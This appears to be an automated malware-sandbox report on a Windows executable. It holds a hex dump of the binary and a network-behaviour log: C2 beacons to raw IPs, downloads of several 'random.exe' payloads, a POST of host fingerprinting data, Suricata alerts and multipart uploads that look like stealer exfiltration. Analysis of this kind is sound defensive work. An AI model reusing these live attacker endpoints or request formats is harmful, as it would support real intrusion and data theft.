04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 00 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c 6a 00 00 4f 00 00 00 00 80 00 00 ac 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 00 00 0c 00 00 00 a8 69 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 4a 00 00 00 20 00 00 00 4c 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 ac 05 00 00 00 80 00 00 00 06 00 00 00 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 00 00 00 02 00 00 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 6a 00 00 00 00 00 00 48 00 00 00 02 00 05 00 28 37 00 00 80 32 00 00 03 00 02 00 1b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 02 00 38 00 00 00 01 00 00 11 73 2f 00 00 06 0a 06 28 16 00 00 0a 7d 20 00 00 04 06 02 7d 21 00 00 04 06 15 7d 1f 00 00 04 06 7c 20 00 00 04 12 00 28 01 00 00 2b 06 7c 20 00 00 04 28 18 00 00 0a 2a 13 30 02 00 50 00 00 00 02 00 00 11 00 7e 02 00 00 04 16 fe 01 0a 06 2c 42 00 72 01 00 00 70 28 19 00 00 0a 00 72 84 00 00 70 28 19 00 00 0a 00 28 05 00 00 06 0b 72 ca 00 00 70 07 28 1a 00 00 0a 28 19 00 00 0a 00 07 28 04 00 00 06 6f 1b 00 00 0a 00 16 28 1c 00 00 0a 00 00 2a 13 30 02 00 38 00 00 00 03 00 00 11 73 32 00 00 06 0a 06 28 16 00 00 0a 7d 28 00 00 04 06 02 7d 29 00 00 04 06 15 7d 27 00 00 04 06 7c 28 00 00 04 12 00 28 02 00 00 2b 06 7c 28 00 00 04 28 18 00 00 0a 2a 13 30 05 00 48 00 00 00 04 00 00 11 00 73 1d 00 00 0a 0a 1a 8d 2f 00 00 01 0b 16 0c 2b 1c 00 07 08 7e 03 00 00 04 06 7e 03 00 00 04 8e 69 6f 1e 00 00 0a 9a a2 00 08 17 58 0c 08 1a fe 04 0d 09 2d dc 72 f0 00 00 70 07 28 1f 00 00 0a 13 04 2b 00 11 04 2a 13 30 02 00 16
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 41 32 42 37 31 42 32 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7ABA2B71B25F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: GET /files/burpin1/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 65 31 3d 31 30 31 39 33 31 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e1=1019315001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /files/geopoxid/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 33 31 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019316001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /files/zhigarko/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 33 31 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019317001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /files/kardanvalov88/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 33 31 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019318001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 39 30 46 42 36 34 38 42 42 44 37 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECB90FB648BBD71F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
Source: global traffic HTTP traffic detected: GET /files/martin/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 39 30 46 42 36 34 38 42 42 44 37 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECB90FB648BBD71F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
Source: global traffic HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 33 31 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019319001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 39 30 46 42 36 34 38 42 42 44 37 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECB90FB648BBD71F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
Source: global traffic HTTP traffic detected: GET /files/loadman/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1Host: home.fivetk5ht.topAccept: */*Content-Type: application/jsonContent-Length: 504087Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 37 39 37 35 35 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3
Source: global traffic HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 39 30 46 42 36 34 38 42 42 44 37 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECB90FB648BBD71F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 33 32 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019320001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /files/karl/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET /zldPRFrmVFHTtKntGpOv1734579851?argument=CmXX9uDEYSg7ov7J1734779763 HTTP/1.1Host: home.fivetk5ht.topAccept: */*
Source: global traffic HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 39 30 46 42 36 34 38 42 42 44 37 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECB90FB648BBD71F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 33 32 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019321001&unit=246122658369
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View IP Address: 185.121.15.192 185.121.15.192
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
May check the online IP address of the machine
Source: unknown DNS query: name: ipinfo.io
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49760 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49787 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49805 -> 104.21.67.146:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49810 -> 104.21.67.146:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49809 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49816 -> 104.21.67.146:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49829 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49833 -> 104.21.67.146:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49842 -> 104.21.67.146:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49850 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49853 -> 104.21.67.146:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49825 -> 104.21.67.146:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49867 -> 104.21.67.146:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49892 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49915 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49925 -> 104.21.91.209:443
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cheapptaxysu.click
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=krR5sxDNE9FUa.r1_N2PJQUMG47JPl6SF8wl79F24pI-1734779729-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 50Host: cheapptaxysu.click
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Q16GXYS6BSXCA0GFZKDCookie: __cf_mw_byp=krR5sxDNE9FUa.r1_N2PJQUMG47JPl6SF8wl79F24pI-1734779729-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18172Host: cheapptaxysu.click
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=MVU42RO0L29Cookie: __cf_mw_byp=krR5sxDNE9FUa.r1_N2PJQUMG47JPl6SF8wl79F24pI-1734779729-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8745Host: cheapptaxysu.click
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=BI1K9O4J8Cookie: __cf_mw_byp=krR5sxDNE9FUa.r1_N2PJQUMG47JPl6SF8wl79F24pI-1734779729-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20386Host: cheapptaxysu.click
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=052ZCT1NTXF1P96Cookie: __cf_mw_byp=krR5sxDNE9FUa.r1_N2PJQUMG47JPl6SF8wl79F24pI-1734779729-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1284Host: cheapptaxysu.click
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=CCBHJ3TNCookie: __cf_mw_byp=krR5sxDNE9FUa.r1_N2PJQUMG47JPl6SF8wl79F24pI-1734779729-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 568140Host: cheapptaxysu.click
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=krR5sxDNE9FUa.r1_N2PJQUMG47JPl6SF8wl79F24pI-1734779729-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 85Host: cheapptaxysu.click
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AFE0C0 recv,recv,recv,recv, 0_2_00AFE0C0
Source: global traffic HTTP traffic detected: GET /uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1User-Agent: FileDownloaderHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1User-Agent: FileDownloaderHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1User-Agent: FileDownloaderCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
